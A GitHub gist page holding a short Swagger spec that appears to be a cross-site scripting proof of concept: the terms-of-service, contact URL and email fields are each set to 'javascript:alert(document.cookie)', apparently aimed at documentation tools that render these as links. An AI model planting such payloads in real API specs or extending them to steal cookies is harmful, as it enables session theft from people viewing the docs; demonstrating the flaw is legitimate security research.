Skip to content

Instantly share code, notes, and snippets.

@llamaonsecurity
Created April 29, 2020 10:35
Show Gist options
  • Save llamaonsecurity/7d898e3ca0ea6d95706c1e68e10cf9cf to your computer and use it in GitHub Desktop.
Save llamaonsecurity/7d898e3ca0ea6d95706c1e68e10cf9cf to your computer and use it in GitHub Desktop.

Revisions

  1. llamaonsecurity created this gist Apr 29, 2020.
    10 changes: 10 additions & 0 deletions fooo
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,10 @@
    swagger: "2.0",
    info:
    title: "Swagger Sample App",
    description: "Please to click Terms of service"
    termsOfService: "javascript:alert(document.cookie)"
    contact:
    name: "API Support",
    url: "javascript:alert(document.cookie)",
    email: "javascript:alert(document.cookie)"
    version: "1.0.1"